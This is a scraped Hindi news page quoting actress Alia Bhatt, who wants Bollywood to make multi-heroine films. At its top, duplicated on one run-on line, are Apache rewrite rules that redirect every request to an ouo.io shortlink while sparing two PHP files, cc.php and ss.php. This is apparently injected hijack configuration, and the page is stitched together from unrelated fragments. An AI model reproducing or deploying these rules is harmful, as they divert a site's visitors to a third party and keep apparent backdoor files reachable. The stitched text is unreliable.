
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 851
Nextमुंबई। आलिया भट्ट बॉलीवुड की चुलबुली हीरोइन है,साथ ही वे बॉलीवुड में सबसे कम उम्र की वाली एक्ट्रर्स है। हम आलिया के बारें में इसलिए बात कर रहे है क्योकि आलिया ने अपनी एक इच्छा जाहिर की है। आलिया ने एक इंटरव्यू में कहा, "जैसे मल्टी हीरो वाली फिल्में बनाई जाती हैं वैसे ही मल्टी हीरोइन वाली फिल्में बनानी चाहिए और ऐसी फिल्म में मैं आगे बढ़ कर काम करना चाहूंगी।
कटरीना और दीपिका दोनों ही मेरी अच्छी दोस्त हैं और मैंने उनके साथ एक करार किया है कि कभी न कभी वो मेरे साथ किसी फिल्म में काम करेंगी। अभी तक मेरे पास ऐसी कोई स्क्रिप्ट नहीं आई है जिसमें मेरे साथ दो अभिनेत्रियों वाला रोल मिला हो लेकिन अगर ऐसा होता है तो मैं उस फिल्म को मना नहीं करुंगी।इसके आगे आलिया कहती है सोचिए अगर 'दिल चाहता है' का एक रीमेक बने जिसमें सभी लड़कियों की कहानी कही जाए तो कैसा लगेगा? बॉलीवुड में महिलाओं के लिए ये अच्छा समय है क्योंकि अब उनके लिए कंटेंट लिखा जा रहा है और मैं चाहूंगी कि ऐसी कोई फिल्म लिखी जाए।